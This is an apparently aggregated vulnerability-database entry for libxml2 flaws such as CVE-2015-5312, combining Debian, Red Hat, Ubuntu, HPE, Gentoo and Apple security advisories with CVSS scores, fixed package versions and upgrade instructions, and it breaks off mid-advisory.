For the oldstable distribution (wheezy), these problems have been fixed in version 2.8.0+dfsg1-7+wheezy5.
For the stable distribution (jessie), these problems have been fixed in version 2.9.1+dfsg1-5+deb8u1.
For the testing distribution (stretch), these problems have been fixed in version 2.9.3+dfsg1-1 or earlier versions.
For the unstable distribution (sid), these problems have been fixed in version 2.9.3+dfsg1-1 or earlier versions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: libxml2 security update Advisory ID: RHSA-2015:2550-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2550.html Issue date: 2015-12-07 CVE Names: CVE-2015-1819 CVE-2015-5312 CVE-2015-7497 CVE-2015-7498 CVE-2015-7499 CVE-2015-7500 CVE-2015-7941 CVE-2015-7942 CVE-2015-8241 CVE-2015-8242 CVE-2015-8317 =====================================================================
- Summary:
Updated libxml2 packages that fix multiple security issues are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
The libxml2 library is a development toolbox providing the implementation of various XML standards.
Several denial of service flaws were found in libxml2, a library providing support for reading, modifying, and writing XML and HTML files. A remote attacker could provide a specially crafted XML or HTML file that, when processed by an application using libxml2, would cause that application to use an excessive amount of CPU, leak potentially sensitive information, or in certain cases crash the application. (CVE-2015-1819, CVE-2015-5312, CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500 CVE-2015-7941, CVE-2015-7942, CVE-2015-8241, CVE-2015-8242, CVE-2015-8317, BZ#1213957, BZ#1281955)
Red Hat would like to thank the GNOME project for reporting CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500, CVE-2015-8241, CVE-2015-8242, and CVE-2015-8317. Upstream acknowledges Kostya Serebryany of Google as the original reporter of CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, and CVE-2015-7500; Hugh Davenport as the original reporter of CVE-2015-8241 and CVE-2015-8242; and Hanno Boeck as the original reporter of CVE-2015-8317. The CVE-2015-1819 issue was discovered by Florian Weimer of Red Hat Product Security.
All libxml2 users are advised to upgrade to these updated packages, which contain a backported patch to correct these issues. The desktop must be restarted (log out, then log back in) for this update to take effect.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1211278 - CVE-2015-1819 libxml2: denial of service processing a crafted XML document 1213957 - libxml2: out-of-bounds memory access when parsing an unclosed HTML comment 1274222 - CVE-2015-7941 libxml2: Out-of-bounds memory access 1276297 - CVE-2015-7942 libxml2: heap-based buffer overflow in xmlParseConditionalSections() 1276693 - CVE-2015-5312 libxml2: CPU exhaustion when processing specially crafted XML input 1281862 - CVE-2015-7497 libxml2: Heap-based buffer overflow in xmlDictComputeFastQKey 1281879 - CVE-2015-7498 libxml2: Heap-based buffer overflow in xmlParseXmlDecl 1281925 - CVE-2015-7499 libxml2: Heap-based buffer overflow in xmlGROW 1281930 - CVE-2015-8317 libxml2: Out-of-bounds heap read when parsing file with unfinished xml declaration 1281936 - CVE-2015-8241 libxml2: Buffer overread with XML parser in xmlNextChar 1281943 - CVE-2015-7500 libxml2: Heap buffer overflow in xmlParseMisc 1281950 - CVE-2015-8242 libxml2: Buffer overread with HTML parser in push mode in xmlSAX2TextNode 1281955 - libxml2: Multiple out-of-bounds reads in xmlDictComputeFastKey.isra.2 and xmlDictAddString.isra.O
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: libxml2-2.9.1-6.el7_2.2.src.rpm
x86_64: libxml2-2.9.1-6.el7_2.2.i686.rpm libxml2-2.9.1-6.el7_2.2.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-python-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.2.i686.rpm libxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm libxml2-static-2.9.1-6.el7_2.2.i686.rpm libxml2-static-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: libxml2-2.9.1-6.el7_2.2.src.rpm
x86_64: libxml2-2.9.1-6.el7_2.2.i686.rpm libxml2-2.9.1-6.el7_2.2.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-python-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.2.i686.rpm libxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm libxml2-static-2.9.1-6.el7_2.2.i686.rpm libxml2-static-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: libxml2-2.9.1-6.el7_2.2.src.rpm
aarch64: libxml2-2.9.1-6.el7_2.2.aarch64.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.aarch64.rpm libxml2-devel-2.9.1-6.el7_2.2.aarch64.rpm libxml2-python-2.9.1-6.el7_2.2.aarch64.rpm
ppc64: libxml2-2.9.1-6.el7_2.2.ppc.rpm libxml2-2.9.1-6.el7_2.2.ppc64.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.ppc.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.ppc64.rpm libxml2-devel-2.9.1-6.el7_2.2.ppc.rpm libxml2-devel-2.9.1-6.el7_2.2.ppc64.rpm libxml2-python-2.9.1-6.el7_2.2.ppc64.rpm
ppc64le: libxml2-2.9.1-6.el7_2.2.ppc64le.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.ppc64le.rpm libxml2-devel-2.9.1-6.el7_2.2.ppc64le.rpm libxml2-python-2.9.1-6.el7_2.2.ppc64le.rpm
s390x: libxml2-2.9.1-6.el7_2.2.s390.rpm libxml2-2.9.1-6.el7_2.2.s390x.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.s390.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.s390x.rpm libxml2-devel-2.9.1-6.el7_2.2.s390.rpm libxml2-devel-2.9.1-6.el7_2.2.s390x.rpm libxml2-python-2.9.1-6.el7_2.2.s390x.rpm
x86_64: libxml2-2.9.1-6.el7_2.2.i686.rpm libxml2-2.9.1-6.el7_2.2.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.2.i686.rpm libxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm libxml2-python-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
aarch64: libxml2-debuginfo-2.9.1-6.el7_2.2.aarch64.rpm libxml2-static-2.9.1-6.el7_2.2.aarch64.rpm
ppc64: libxml2-debuginfo-2.9.1-6.el7_2.2.ppc.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.ppc64.rpm libxml2-static-2.9.1-6.el7_2.2.ppc.rpm libxml2-static-2.9.1-6.el7_2.2.ppc64.rpm
ppc64le: libxml2-debuginfo-2.9.1-6.el7_2.2.ppc64le.rpm libxml2-static-2.9.1-6.el7_2.2.ppc64le.rpm
s390x: libxml2-debuginfo-2.9.1-6.el7_2.2.s390.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.s390x.rpm libxml2-static-2.9.1-6.el7_2.2.s390.rpm libxml2-static-2.9.1-6.el7_2.2.s390x.rpm
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-static-2.9.1-6.el7_2.2.i686.rpm libxml2-static-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: libxml2-2.9.1-6.el7_2.2.src.rpm
x86_64: libxml2-2.9.1-6.el7_2.2.i686.rpm libxml2-2.9.1-6.el7_2.2.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.2.i686.rpm libxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm libxml2-python-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-static-2.9.1-6.el7_2.2.i686.rpm libxml2-static-2.9.1-6.el7_2.2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-1819 https://access.redhat.com/security/cve/CVE-2015-5312 https://access.redhat.com/security/cve/CVE-2015-7497 https://access.redhat.com/security/cve/CVE-2015-7498 https://access.redhat.com/security/cve/CVE-2015-7499 https://access.redhat.com/security/cve/CVE-2015-7500 https://access.redhat.com/security/cve/CVE-2015-7941 https://access.redhat.com/security/cve/CVE-2015-7942 https://access.redhat.com/security/cve/CVE-2015-8241 https://access.redhat.com/security/cve/CVE-2015-8242 https://access.redhat.com/security/cve/CVE-2015-8317 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
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Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
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-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . 6) - i386, x86_64
- ============================================================================ Ubuntu Security Notice USN-2834-1 December 14, 2015
libxml2 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 15.10
- Ubuntu 15.04
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
libxml2 could be made to crash if it opened a specially crafted file. (CVE-2015-5312, CVE-2015-7497, CVE-2015-7498, CVE-2015-7499,CVE-2015-7500)
Hugh Davenport discovered that libxml2 incorrectly handled certain malformed documents. (CVE-2015-8241, CVE-2015-8242)
Hanno Boeck discovered that libxml2 incorrectly handled certain malformed documents. This issue only applied to Ubuntu 12.04 LTS, Ubuntu 14.04 LTS and Ubuntu 15.04. (CVE-2015-8317)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 15.10: libxml2 2.9.2+zdfsg1-4ubuntu0.2
Ubuntu 15.04: libxml2 2.9.2+dfsg1-3ubuntu0.2
Ubuntu 14.04 LTS: libxml2 2.9.1+dfsg1-3ubuntu4.6
Ubuntu 12.04 LTS: libxml2 2.7.8.dfsg-5.1ubuntu4.13
After a standard system update you need to reboot your computer to make all the necessary changes
Show details on source website{
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"db": "CNNVD",
"id": "CNNVD-201512-443"
},
{
"db": "NVD",
"id": "CVE-2015-5312"
}
]
},
"credits": {
"_id": null,
"data": "Kostya Serebryany of Google.",
"sources": [
{
"db": "BID",
"id": "79536"
}
],
"trust": 0.3
},
"cve": "CVE-2015-5312",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.1,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2015-5312",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 1.1,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.1,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-83273",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-5312",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201512-443",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-83273",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2015-5312",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-83273"
},
{
"db": "VULMON",
"id": "CVE-2015-5312"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-443"
},
{
"db": "NVD",
"id": "CVE-2015-5312"
}
]
},
"description": {
"_id": null,
"data": "The xmlStringLenDecodeEntities function in parser.c in libxml2 before 2.9.3 does not properly prevent entity expansion, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted XML data, a different vulnerability than CVE-2014-3660. libxml2 is prone to a denial-of-service vulnerability. \nSuccessful exploits may allow an attacker to cause an affected application to consume excessive amounts of CPU, resulting in a denial-of-service condition. \nlibxml2 2.9.2 is vulnerable; other versions may also be affected. It supports multiple encoding formats, XPath analysis, Well-formed and valid verification, etc. The vulnerability is caused by the program not properly restricting entity expansion. Alternatively,\nyou may manually check for software updates by selecting\n\"Settings -\u003e System -\u003e Software Update -\u003e Update Software.\". \n\nTo check the current version of software, select\n\"Settings -\u003e General -\u003e About\". Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library. \n\nThis release of Red Hat JBoss Web Server 3.0.3 serves as a replacement for\nRed Hat JBoss Web Server 3.0.2, and includes bug fixes and enhancements,\nwhich are documented in the Release Notes documented linked to in the\nReferences. (CVE-2015-5312,\nCVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500, CVE-2015-7942,\nCVE-2015-8035, CVE-2015-8710, CVE-2015-7941, CVE-2015-8241, CVE-2015-8242,\nCVE-2015-8317)\n\n* A session fixation flaw was found in the way Tomcat recycled the\nrequestedSessionSSL field. If at least one web application was configured\nto use the SSL session ID as the HTTP session ID, an attacker could reuse a\npreviously used session ID for further requests. (CVE-2015-5346)\n\n* A CSRF flaw was found in Tomcat\u0027s the index pages for the Manager and\nHost Manager applications. These applications included a valid CSRF token\nwhen issuing a redirect as a result of an unauthenticated request to the\nroot of the web application. This token could then be used by an attacker\nto perform a CSRF attack. (CVE-2015-5351)\n\n* It was found that several Tomcat session persistence mechanisms could\nallow a remote, authenticated user to bypass intended SecurityManager\nrestrictions and execute arbitrary code in a privileged context via a web\napplication that placed a crafted object in a session. (CVE-2016-0714)\n\n* A security manager bypass flaw was found in Tomcat that could allow\nremote, authenticated users to access arbitrary application data,\npotentially resulting in a denial of service. (CVE-2016-0763)\n\n* A use-after-free flaw was found in the way OpenSSL imported malformed\nElliptic Curve private keys. (CVE-2015-0209)\n\n* It was found that Tomcat could reveal the presence of a directory even\nwhen that directory was protected by a security constraint. A user could\nmake a request to a directory via a URL not ending with a slash and,\ndepending on whether Tomcat redirected that request, could confirm whether\nthat directory existed. (CVE-2015-5345)\n\n* It was found that Tomcat allowed the StatusManagerServlet to be loaded by\na web application when a security manager was configured. This allowed a\nweb application to list all deployed web applications and expose sensitive\ninformation such as session IDs. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying the update, back up your\nexisting Red Hat JBoss Web Server installation (including all applications\nand configuration files). \n\nAfter installing the updated packages, the httpd daemon will be restarted\nautomatically. JIRA issues fixed (https://issues.jboss.org/):\n\nJWS-271 - User submitted session ID\nJWS-272 - User submitted session ID\nJWS-276 - Welcome File processing refactoring - CVE-2015-5345 low\nJWS-277 - Welcome File processing refactoring - CVE-2015-5345 low\nJWS-303 - Avoid useless session creation for manager webapps - CVE-2015-5351 moderate\nJWS-304 - Restrict another manager servlet - CVE-2016-0706 low\nJWS-349 - Session serialization safety - CVE-2016-0714 moderate\nJWS-350 - Protect ResourceLinkFactory.setGlobalContext() - CVE-2016-0763 moderate\n\n6. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n\na-c04944172\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04944172\nVersion: 1\n\nHPSBGN03537 rev.1 - HPE IceWall Federation Agent and IceWall File Manager\nrunning libXML2, Remote or Local Denial of Service (DoS)\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\n - IceWall File Manager 3.0\n - IceWall Federation Agent 3.0\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2015-5312 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1\nCVE-2015-7497 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-7498 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-7499 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2015-7500 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-7941 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2015-7942 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-8241 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4\nCVE-2015-8242 (AV:N/AC:M/Au:N/C:P/I:N/A:P) 5.8\nCVE-2015-8317 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHPE recommends applying the latest OS vendor security patches for libXML2 to\nresolve the vulnerabilities in the libXML2 library. \n\nPlease note that the HP IceWall product is only available in Japan. \n\nHISTORY\nVersion:1 (rev.1) - 22 January 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability with any HPE supported\nproduct, send Email to: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201701-37\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: libxml2: Multiple vulnerabilities\n Date: January 16, 2017\n Bugs: #564776, #566374, #572878, #573820, #577998, #582538,\n #582540, #583888, #589816, #597112, #597114, #597116\n ID: 201701-37\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in libxml2, the worst of which\ncould lead to the execution of arbitrary code. \n\nBackground\n==========\n\nlibxml2 is the XML (eXtended Markup Language) C parser and toolkit\ninitially developed for the Gnome project. Please review\nthe CVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll libxml2 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/libxml2-2.9.4-r1\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-1819\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1819\n[ 2 ] CVE-2015-5312\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5312\n[ 3 ] CVE-2015-7497\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7497\n[ 4 ] CVE-2015-7498\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7498\n[ 5 ] CVE-2015-7499\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7499\n[ 6 ] CVE-2015-7500\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7500\n[ 7 ] CVE-2015-7941\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7941\n[ 8 ] CVE-2015-7942\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7942\n[ 9 ] CVE-2015-8035\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8035\n[ 10 ] CVE-2015-8242\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8242\n[ 11 ] CVE-2015-8806\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8806\n[ 12 ] CVE-2016-1836\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1836\n[ 13 ] CVE-2016-1838\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1838\n[ 14 ] CVE-2016-1839\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1839\n[ 15 ] CVE-2016-1840\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1840\n[ 16 ] CVE-2016-2073\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2073\n[ 17 ] CVE-2016-3627\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3627\n[ 18 ] CVE-2016-3705\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3705\n[ 19 ] CVE-2016-4483\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4483\n[ 20 ] CVE-2016-4658\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4658\n[ 21 ] CVE-2016-5131\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5131\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201701-37\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2017 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-03-21-2 watchOS 2.2\n\nwatchOS 2.2 is now available and addresses the following:\n\nDisk Images\nAvailable for: Apple Watch Sport, Apple Watch, Apple Watch Edition,\nand Apple Watch Hermes\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the parsing of\ndisk images. This issue was addressed through improved memory\nhandling. \nCVE-ID\nCVE-2016-1717 : Frank Graziano of Yahoo! Pentest Team\n\nFontParser\nAvailable for: Apple Watch Sport, Apple Watch, Apple Watch Edition,\nand Apple Watch Hermes\nImpact: Opening a maliciously crafted PDF file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with\nTrend Micro\u0027s Zero Day Initiative (ZDI)\n\nHTTPProtocol\nAvailable for: Apple Watch Sport, Apple Watch, Apple Watch Edition,\nand Apple Watch Hermes\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple vulnerabilities existed in nghttp2 versions\nprior to 1.6.0, the most serious of which may have led to remote code\nexecution. These were addressed by updating nghttp2 to version 1.6.0. \nCVE-ID\nCVE-2015-8659\n\nIOHIDFamily\nAvailable for: Apple Watch Sport, Apple Watch, Apple Watch Edition,\nand Apple Watch Hermes\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1719 : Ian Beer of Google Project Zero\n\nIOHIDFamily\nAvailable for: Apple Watch Sport, Apple Watch, Apple Watch Edition,\nand Apple Watch Hermes\nImpact: An application may be able to determine kernel memory layout\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1748 : Brandon Azad\n\nKernel\nAvailable for: Apple Watch Sport, Apple Watch, Apple Watch Edition,\nand Apple Watch Hermes\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1720 : Ian Beer of Google Project Zero\nCVE-2016-1721 : Ian Beer of Google Project Zero and Ju Zhu of Trend\nMicro\nCVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team\nCVE-2016-1755 : Ian Beer of Google Project Zero\n\nKernel\nAvailable for: Apple Watch Sport, Apple Watch, Apple Watch Edition,\nand Apple Watch Hermes\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A use after free issue was addressed through improved\nmemory management. \nCVE-ID\nCVE-2016-1750 : CESG\n\nKernel\nAvailable for: Apple Watch Sport, Apple Watch, Apple Watch Edition,\nand Apple Watch Hermes\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple integer overflows were addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro\u0027s Zero\nDay Initiative (ZDI)\n\nKernel\nAvailable for: Apple Watch Sport, Apple Watch, Apple Watch Edition,\nand Apple Watch Hermes\nImpact: An application may be able to bypass code signing\nDescription: A permissions issue existed in which execute permission\nwas incorrectly granted. This issue was addressed through improved\npermission validation. \nCVE-ID\nCVE-2016-1751 : Eric Monti of Square Mobile Security\n\nKernel\nAvailable for: Apple Watch Sport, Apple Watch, Apple Watch Edition,\nand Apple Watch Hermes\nImpact: An application may be able to cause a denial of service\nDescription: A denial of service issue was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1752 : CESG\n\nlibxml2\nAvailable for: Apple Watch Sport, Apple Watch, Apple Watch Edition,\nand Apple Watch Hermes\nImpact: Processing maliciously crafted XML may lead to unexpected\napplication termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2015-1819\nCVE-2015-5312 : David Drysdale of Google\nCVE-2015-7499\nCVE-2015-7500 : Kostya Serebryany of Google\nCVE-2015-7942 : Kostya Serebryany of Google\nCVE-2015-8035 : gustavo.grieco\nCVE-2015-8242 : Hugh Davenport\nCVE-2016-1761 : wol0xff working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\nCVE-2016-1762\n\nlibxslt\nAvailable for: Apple Watch Sport, Apple Watch, Apple Watch Edition,\nand Apple Watch Hermes\nImpact: Processing maliciously crafted XML may lead to unexpected\napplication termination or arbitrary code execution\nDescription: A type confusion issue was addressed through improved\nmemory handling. \nCVE-ID\nCVE-2015-7995 : puzzor\n\nMessages\nAvailable for: Apple Watch Sport, Apple Watch, Apple Watch Edition,\nand Apple Watch Hermes\nImpact: An attacker who is able to bypass Apple\u0027s certificate\npinning, intercept TLS connections, inject messages, and record\nencrypted attachment-type messages may be able to read attachments\nDescription: A cryptographic issue was addressed by rejecting\nduplicate messages on the client. \nCVE-ID\nCVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk,\nIan Miers, and Michael Rushanan of Johns 